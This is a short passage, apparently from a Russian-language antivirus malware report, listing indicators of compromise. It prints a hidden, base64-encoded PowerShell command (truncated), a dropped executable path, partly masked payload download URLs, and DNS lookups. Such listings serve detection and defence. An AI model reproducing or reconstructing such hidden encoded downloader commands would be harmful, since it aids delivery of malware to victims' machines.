Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABFAGEAcQBlAGsAcQBkAHIAPQAnAFIAZABpAGgAeQBoAG8AawByACcAOwAkAFEAbABpAGQAcwB2AG0AZwB4ACAAPQAgACcANgA5ADcAJwA7ACQAWgBlAGsAcABpAHcAYQBmAGkAZwB5AHcAPQAnAEIAegBuAHA...
- %HOMEPATH%\697.exe
- %HOMEPATH%\697.exe
- http://ic####graphics.com/wp-content/o1cu7628/
- http://bu#####istadvtours.com/m5_edit_item/06605ld03197/
- http://na####school.com/naavikschool.com/ooqvi7a0682/
- DNS ASK ar##jbd.com
- DNS ASK he##k.com
- DNS ASK ic####graphics.com
- DNS ASK bu#####istadvtours.com
- DNS ASK na####school.com